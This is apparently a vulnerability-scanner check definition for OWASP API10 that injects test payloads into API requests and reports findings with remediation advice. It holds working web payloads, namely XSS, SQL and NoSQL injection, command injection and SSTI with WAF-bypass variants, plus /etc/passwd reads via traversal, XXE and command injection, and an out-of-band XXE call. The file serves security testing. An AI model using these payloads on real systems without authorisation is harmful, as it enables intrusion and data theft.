metadata:
    language: v2-beta
    name: "API10:2023 - Unsafe Consumption of APIs"
    description: "Detects unsafe consumption of third-party APIs including injection via upstream responses, SSRF via redirects, insecure deserialization, and data validation failures"
    author: "OWASP API Security"
    tags: "owasp-api-top10", "unsafe-consumption", "third-party", "injection", "api10"

define:
    # Injection payloads that might come through third-party API responses
    xss_payload_1 = '<script>alert("XSS")</script>'
    xss_payload_2 = '<img src=x onerror=alert(1)>'
    xss_payload_svg = '<svg onload=alert(1)>'
    xss_payload_event = '" onfocus="alert(1)" autofocus="'
    # WAF bypass XSS
    xss_waf_bypass_1 = '<scr<script>ipt>alert(1)</scr</script>ipt>'
    xss_waf_bypass_2 = '<SCRIPT>alert(1)</SCRIPT>'
    xss_waf_bypass_3 = '"><img/src=x onerror=alert(1)>'
    xss_waf_bypass_4 = "javascript:alert(1)"
    xss_waf_bypass_5 = '<details open ontoggle=alert(1)>'
    xss_waf_bypass_unicode = '<script>al\u0065rt(1)</script>'
    # SQL Injection via third-party data
    sqli_payload_1 = "' OR '1'='1"
    sqli_payload_2 = "1' UNION SELECT null,null,null--"
    sqli_payload_3 = "'; WAITFOR DELAY '0:0:5'--"
    sqli_payload_time = "1' AND SLEEP(5)--"
    # WAF bypass SQLi
    sqli_waf_bypass_1 = "1'/*!50000UNION*//*!50000SELECT*/null,null--"
    sqli_waf_bypass_2 = "1' UNI%4FN SEL%45CT null--"
    sqli_waf_bypass_3 = "1' UNION%0ASELECT%0Anull--"
    sqli_waf_bypass_4 = "1'||'1'='1"
    sqli_waf_bypass_case = "1' uNiOn SeLeCt null--"
    # NoSQL Injection
    nosql_payload_1 = '{"$gt":""}'
    nosql_payload_2 = '{"$ne":null}'
    nosql_payload_3 = '{"$regex":".*"}'
    # Command injection via third-party input
    cmdi_payload_1 = "; id"
    cmdi_payload_2 = "| id"
    cmdi_payload_3 = "$(id)"
    cmdi_payload_4 = "`id`"
    # WAF bypass command injection
    cmdi_waf_bypass_1 = ";{id}"
    cmdi_waf_bypass_2 = "|{cat,/etc/passwd}"
    cmdi_waf_bypass_3 = "$({cat,/etc/passwd})"
    cmdi_waf_bypass_newline = "%0aid"
    # SSTI payloads
    ssti_payload_1 = "{{7*7}}"
    ssti_payload_2 = "${7*7}"
    ssti_payload_3 = "#{7*7}"
    ssti_payload_jinja = "{{config.items()}}"
    # XXE via third-party XML
    xxe_payload = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><data>&xxe;</data></root>'
    xxe_oob = '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://burpcollaborator.net/xxe">%xxe;]><root>test</root>'
    # LDAP injection
    ldap_payload_1 = "*)(&"
    ldap_payload_2 = "*)(objectClass=*"
    # Header injection
    header_inject_1 = "test\r\nX-Injected: true"
    # Path traversal
    path_traversal_1 = "../../../etc/passwd"
    path_traversal_2 = "..%2f..%2f..%2fetc%2fpasswd"
    path_traversal_3 = "....//....//....//etc/passwd"
    path_traversal_4 = "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd"

given request then
    if not({base.request.url} matches "(api|v[0-9]|rest|graphql|service)")  then
        log(message: "Skipping non-API endpoint")
    end if

    # === XSS INJECTION TESTS ===

    # Test 1: Reflected XSS via API parameters
    if {base.request.url} matches "[?&][^=]+=" then
        send request called xss_check_1:
            method: {base.request.method}
            replacing: regex("([?&][^=]+=)[^&]*", `$1{xss_payload_1}`)
            headers: {base.request.headers}

        if {xss_check_1.response.body} matches "<script>alert\\(\"XSS\"\\)</script>" then
            report issue:
                severity: high
                confidence: firm
                detail: "Reflected XSS: Script tag payload is reflected unescaped in the API response. If the response is rendered in a browser context, this enables cross-site scripting."
                remediation: "HTML-encode all output. Implement Content-Security-Policy headers. Validate and sanitize all input at the API boundary."
        end if

        # WAF bypass XSS
        send request called xss_waf_1:
            method: {base.request.method}
            replacing: regex("([?&][^=]+=)[^&]*", `$1{xss_waf_bypass_3}`)
            headers: {base.request.headers}

        if {xss_waf_1.response.body} matches "onerror=alert" then
            report issue:
                severity: high
                confidence: firm
                detail: "Reflected XSS (WAF Bypass): Event handler-based XSS payload bypassed WAF and is reflected in the response."
                remediation: "Use context-aware output encoding. Don't rely solely on WAF for XSS prevention. Implement CSP headers."
        end if

        # SVG-based XSS
        send request called xss_svg:
            method: {base.request.method}
            replacing: regex("([?&][^=]+=)[^&]*", `$1{xss_payload_svg}`)
            headers: {base.request.headers}

        if {xss_svg.response.body} matches "<svg onload=" then
            report issue:
                severity: high
                confidence: firm
                detail: "Reflected XSS via SVG: SVG onload event payload is reflected unescaped."
                remediation: "Sanitize SVG content. Strip event handlers from all HTML/SVG elements. Use a strict CSP."
        end if
    end if

    # XSS in POST body
    if {base.request.method} matches "(POST|PUT|PATCH)" then
        if {base.request.headers} matches "application/json" then
            send request called xss_body:
                method: {base.request.method}
                path: {base.request.url}
                headers: {base.request.headers}
                replacing: regex("\"[^\"]+\"\\s*:\\s*\"[^\"]*\"", `"test":"<script>alert(1)</script>"`)

            if {xss_body.response.body} matches "<script>alert\\(1\\)</script>" then
                report issue:
                    severity: high
                    confidence: firm
                    detail: "Stored/Reflected XSS via JSON Body: Script payload in JSON body is reflected unescaped in the response, indicating the API does not sanitize data from third-party or user inputs."
                    remediation: "Sanitize all data before storage and output. Apply context-appropriate encoding. Treat all external data as untrusted."
            end if
        end if
    end if

    # === SQL INJECTION TESTS ===

    # Test 2: SQL Injection in query parameters
    if {base.request.url} matches "[?&][^=]+=" then
        send request called sqli_check_1:
            method: {base.request.method}
            replacing: regex("([?&][^=]+=)[^&]*", `$1{sqli_payload_1}`)
            headers: {base.request.headers}

        if {sqli_check_1.response.body} matches "(SQL syntax|mysql|sqlite|postgresql|ORA-|microsoft|syntax error|unclosed quotation|unterminated string)" then
            report issue:
                severity: high
                confidence: firm
                detail: "SQL Injection: SQL error message returned when injecting SQL syntax via query parameter. The API constructs SQL queries using unsanitized input, whether from direct users or consumed third-party APIs."
                remediation: "Use parameterized queries / prepared statements. Never concatenate user or third-party input into SQL strings. Validate all input at API boundaries."
        end if

        # Union-based SQLi
        send request called sqli_union:
            method: {base.request.method}
            replacing: regex("([?&][^=]+=)[^&]*", `$1{sqli_payload_2}`)
            headers: {base.request.headers}

        if {sqli_union.response.status_code} is 200 then
            if {sqli_union.response.body} differs from {base.response.body} then
                if not({sqli_union.response.body} matches "(error|invalid|bad request)") then
                    report issue:
                        severity: high
                        confidence: tentative
                        detail: "Potential SQL Injection (UNION): UNION SELECT payload returned a different response without errors, suggesting successful query modification."
                        remediation: "Use parameterized queries. Implement input validation with strict type checking."
                end if
            end if
        end if

        # WAF bypass SQLi - MySQL version comment
        send request called sqli_waf_1:
            method: {base.request.method}
            replacing: regex("([?&][^=]+=)[^&]*", `$1{sqli_waf_bypass_1}`)
            headers: {base.request.headers}

        if {sqli_waf_1.response.status_code} is 200 then
            if {sqli_waf_1.response.body} differs from {base.response.body} then
                if not({sqli_waf_1.response.body} matches "(error|invalid|blocked|forbidden)") then
                    report issue:
                        severity: high
                        confidence: tentative
                        detail: "SQL Injection (WAF Bypass - MySQL Comment): Using MySQL version-specific comments (/*!50000UNION*/) bypassed WAF protection."
                        remediation: "Use parameterized queries regardless of WAF presence. WAFs are defense-in-depth, not primary protection."
                end if
            end if
        end if

        # WAF bypass SQLi - case variation
        send request called sqli_waf_case:
            method: {base.request.method}
            replacing: regex("([?&][^=]+=)[^&]*", `$1{sqli_waf_bypass_case}`)
            headers: {base.request.headers}

        if {sqli_waf_case.response.status_code} is 200 then
            if {sqli_waf_case.response.body} differs from {base.response.body} then
                report issue:
                    severity: high
                    confidence: tentative
                    detail: "SQL Injection (WAF Bypass - Case Variation): Mixed-case SQL keywords bypassed WAF pattern matching."
                    remediation: "Use parameterized queries. WAF keyword filters are easily bypassed with case variations."
            end if
        end if

        # WAF bypass SQLi - newline
        send request called sqli_waf_newline:
            method: {base.request.method}
            replacing: regex("([?&][^=]+=)[^&]*", `$1{sqli_waf_bypass_3}`)
            headers: {base.request.headers}

        if {sqli_waf_newline.response.status_code} is 200 then
            if {sqli_waf_newline.response.body} differs from {base.response.body} then
                report issue:
                    severity: high
                    confidence: tentative
                    detail: "SQL Injection (WAF Bypass - Newline): URL-encoded newlines between SQL keywords bypassed WAF detection."
                    remediation: "Normalize input (strip/replace whitespace variants) before WAF evaluation. Use parameterized queries as primary defense."
            end if
        end if
    end if

    # SQL Injection in JSON body
    if {base.request.method} matches "(POST|PUT|PATCH)" then
        if {base.request.headers} matches "application/json" then
            send request called sqli_json:
                method: {base.request.method}
                path: {base.request.url}
                headers: {base.request.headers}
                replacing: regex("\"[^\"]+\"\\s*:\\s*\"[^\"]*\"", `"id":"1' OR '1'='1"`)

            if {sqli_json.response.body} matches "(SQL syntax|mysql|sqlite|postgresql|ORA-|syntax error)" then
                report issue:
                    severity: high
                    confidence: firm
                    detail: "SQL Injection via JSON Body: SQL error when injecting through JSON fields. The API processes data from request bodies (or consumed APIs) without parameterized queries."
                    remediation: "Use parameterized queries for all database operations. Validate JSON field types and values."
            end if
        end if
    end if

    # === NoSQL INJECTION TESTS ===

    # Test 3: NoSQL Injection
    if {base.request.method} matches "(POST|PUT|PATCH)" then
        if {base.request.headers} matches "application/json" then
            send request called nosql_check:
                method: {base.request.method}
                path: {base.request.url}
                headers: {base.request.headers}
                replacing: regex("\"[^\"]+\"\\s*:\\s*\"[^\"]*\"", `"username":{"$gt":""},"password":{"$gt":""}`)

            if {nosql_check.response.status_code} is 200 then
                if {nosql_check.response.body} matches "(token|session|user|auth|login|success)" then
                    report issue:
                        severity: high
                        confidence: firm
                        detail: "NoSQL Injection: MongoDB operator injection ($gt) in JSON body returned authentication success, bypassing login controls."
                        remediation: "Validate input types strictly. Reject objects where strings are expected. Use parameterized queries for MongoDB. Sanitize MongoDB operators from user input."
                end if
            end if

            # $regex injection
            send request called nosql_regex:
                method: {base.request.method}
                path: {base.request.url}
                headers: {base.request.headers}
                replacing: regex("\"[^\"]+\"\\s*:\\s*\"[^\"]*\"", `"username":{"$regex":".*"}`)

            if {nosql_regex.response.status_code} is 200 then
                report issue:
                    severity: high
                    confidence: tentative
                    detail: "NoSQL Injection ($regex): MongoDB $regex operator accepted in input, enabling data extraction via regex-based enumeration."
                    remediation: "Reject MongoDB operators in user input. Implement strict type validation. Use allow-lists for query operators."
            end if
        end if
    end if

    # === COMMAND INJECTION TESTS ===

    # Test 4: Command Injection
    if {base.request.url} matches "(cmd|exec|command|ping|host|lookup|nslookup|dig|ip|domain|filename|file|path|dir)" then
        send request called cmdi_check_1:
            method: {base.request.method}
            replacing: regex("(cmd|exec|command|ping|host|lookup|ip|domain|filename|file|path)=[^&]+", `$1=test{cmdi_payload_1}`)
            headers: {base.request.headers}

        if {cmdi_check_1.response.body} matches "(uid=|gid=|groups=)" then
            report issue:
                severity: high
                confidence: firm
                detail: "OS Command Injection: Semicolon-based command injection executed 'id' command. The API passes user input to system commands without sanitization."
                remediation: "Never pass user input to system commands. Use language-native APIs instead of shell commands. If shell commands are necessary, use strict allowlists and parameterized commands."
        end if

        # Pipe-based command injection
        send request called cmdi_pipe:
            method: {base.request.method}
            replacing: regex("(cmd|exec|command|ping|host|lookup|ip|domain|filename|file|path)=[^&]+", `$1=test{cmdi_payload_2}`)
            headers: {base.request.headers}

        if {cmdi_pipe.response.body} matches "(uid=|gid=|groups=)" then
            report issue:
                severity: high
                confidence: firm
                detail: "OS Command Injection (pipe): Pipe-based command injection succeeded."
                remediation: "Avoid shell command execution. Use safe APIs. Validate and sanitize all input."
        end if

        # WAF bypass - newline injection
        send request called cmdi_waf_newline:
            method: {base.request.method}
            replacing: regex("(cmd|exec|command|ping|host|lookup|ip|domain)=[^&]+", `$1=test{cmdi_waf_bypass_newline}`)
            headers: {base.request.headers}

        if {cmdi_waf_newline.response.body} matches "(uid=|gid=|groups=)" then
            report issue:
                severity: high
                confidence: firm
                detail: "OS Command Injection (WAF Bypass - Newline): URL-encoded newline (%0a) followed by 'id' command bypassed command injection WAF rules."
                remediation: "Strip newlines and control characters from input. Use parameterized commands. Don't rely on WAF for command injection prevention."
        end if
    end if

    # === SSTI TESTS ===

    # Test 5: Server-Side Template Injection
    if {base.request.url} matches "[?&][^=]+=" then
        send request called ssti_check_1:
            method: {base.request.method}
            replacing: regex("([?&][^=]+=)[^&]*", `$1{ssti_payload_1}`)
            headers: {base.request.headers}

        if {ssti_check_1.response.body} matches "49" then
            report issue:
                severity: high
                confidence: firm
                detail: "Server-Side Template Injection (SSTI): Template expression {{7*7}} was evaluated to 49, indicating the API processes user input as template code. This can lead to remote code execution."
                remediation: "Never pass user input to template engines. Use logic-less templates. Sandbox template execution."
        end if

        send request called ssti_check_2:
            method: {base.request.method}
            replacing: regex("([?&][^=]+=)[^&]*", `$1{ssti_payload_2}`)
            headers: {base.request.headers}

        if {ssti_check_2.response.body} matches "49" then
            report issue:
                severity: high
                confidence: firm
                detail: "Server-Side Template Injection (${} syntax): Expression ${7*7} evaluated to 49, confirming SSTI vulnerability with dollar-brace syntax."
                remediation: "Sanitize all template inputs. Use auto-escaping templates. Never concatenate user input into template strings."
        end if
    end if

    # === XXE TESTS ===

    # Test 6: XML External Entity Injection
    if {base.request.headers} matches "(xml|text/xml|application/xml)" then
        send request called xxe_check:
            method: {base.request.method}
            path: {base.request.url}
            replacing header: "Content-Type" => "application/xml"
            body: `{xxe_payload}`

        if {xxe_check.response.body} matches "(root:|nobody:|daemon:)" then
            report issue:
                severity: high
                confidence: firm
                detail: "XML External Entity (XXE) Injection: The API processes XML with external entity declarations, allowing local file read (/etc/passwd). This can also enable SSRF and denial of service."
                remediation: "Disable DTD processing and external entity resolution. Use JSON instead of XML. Configure XML parsers to reject DTDs."
        end if
    end if

    # Test XXE via Content-Type switching
    if {base.request.headers} matches "application/json" then
        send request called xxe_content_type:
            method: {base.request.method}
            path: {base.request.url}
            replacing header: "Content-Type" => "application/xml"
            body: `{xxe_payload}`

        if {xxe_content_type.response.body} matches "(root:|nobody:|daemon:)" then
            report issue:
                severity: high
                confidence: firm
                detail: "XXE via Content-Type Switching: Changing Content-Type from JSON to XML and sending XXE payload succeeded. The API accepts multiple content types without consistent security controls."
                remediation: "Reject unexpected Content-Types. If XML must be supported, disable DTD processing. Apply consistent input validation across all content types."
        end if
    end if

    # === PATH TRAVERSAL TESTS ===

    # Test 7: Path Traversal
    if {base.request.url} matches "(file|path|name|dir|folder|doc|page|template|include|load|read)" then
        send request called path_trav_1:
            method: {base.request.method}
            replacing: regex("(file|path|name|dir|folder|doc|page|template|include|load|read)=[^&]+", `$1={path_traversal_1}`)
            headers: {base.request.headers}

        if {path_trav_1.response.body} matches "(root:|nobody:|daemon:)" then
            report issue:
                severity: high
                confidence: firm
                detail: "Path Traversal: ../../../etc/passwd payload returned file contents. The API allows directory traversal to access files outside the intended directory."
                remediation: "Validate file paths against an allowlist. Use chroot/jail for file operations. Canonicalize paths before access. Never concatenate user input into file paths."
        end if

        # Double URL-encoded traversal (WAF bypass)
        send request called path_trav_double:
            method: {base.request.method}
            replacing: regex("(file|path|name|dir|folder|doc|page|template|include|load|read)=[^&]+", `$1={path_traversal_4}`)
            headers: {base.request.headers}

        if {path_trav_double.response.body} matches "(root:|nobody:|daemon:)" then
            report issue:
                severity: high
                confidence: firm
                detail: "Path Traversal (WAF Bypass - Double Encoding): Double URL-encoded path traversal bypassed WAF protection. The server decodes twice before file access."
                remediation: "Decode URLs only once. Validate paths after full decoding. Use allowlists for accessible files/directories."
        end if

        # Dot-dot-slash variant bypass
        send request called path_trav_variant:
            method: {base.request.method}
            replacing: regex("(file|path|name|dir|folder|doc|page|template|include|load|read)=[^&]+", `$1={path_traversal_3}`)
            headers: {base.request.headers}

        if {path_trav_variant.response.body} matches "(root:|nobody:|daemon:)" then
            report issue:
                severity: high
                confidence: firm
                detail: "Path Traversal (WAF Bypass - Dot Variant): Using ....// instead of ../ bypassed path traversal filtering."
                remediation: "Canonicalize paths before validation. Use recursive sanitization. Validate the resolved absolute path against allowed directories."
        end if
    end if

    # === HEADER INJECTION ===

    # Test 8: HTTP Header Injection / CRLF
    if {base.request.url} matches "[?&][^=]+=" then
        send request called crlf_check:
            method: {base.request.method}
            replacing: regex("([?&][^=]+=)[^&]*", `$1{header_inject_1}`)
            headers: {base.request.headers}

        if {crlf_check.response.headers} matches "X-Injected: true" then
            report issue:
                severity: high
                confidence: firm
                detail: "HTTP Header Injection (CRLF): Injected CRLF characters in the query parameter resulted in an additional response header. This enables response splitting, cache poisoning, and XSS."
                remediation: "Strip CR (\\r) and LF (\\n) characters from all input used in HTTP headers. Validate header values."
        end if
    end if

    # === LDAP INJECTION ===

    # Test 9: LDAP Injection
    if {base.request.url} matches "(user|search|lookup|query|find|dn|cn|uid)" then
        send request called ldap_check:
            method: {base.request.method}
            replacing: regex("(user|search|lookup|query|find|uid)=[^&]+", `$1={ldap_payload_2}`)
            headers: {base.request.headers}

        if {ldap_check.response.status_code} is 200 then
            if {ldap_check.response.body} differs from {base.response.body} then
                report issue:
                    severity: high
                    confidence: tentative
                    detail: "Potential LDAP Injection: Injecting LDAP filter characters changed the API response, suggesting LDAP queries are constructed with unsanitized input."
                    remediation: "Escape LDAP special characters in user input. Use parameterized LDAP queries. Validate input against expected patterns."
            end if
        end if
    end if
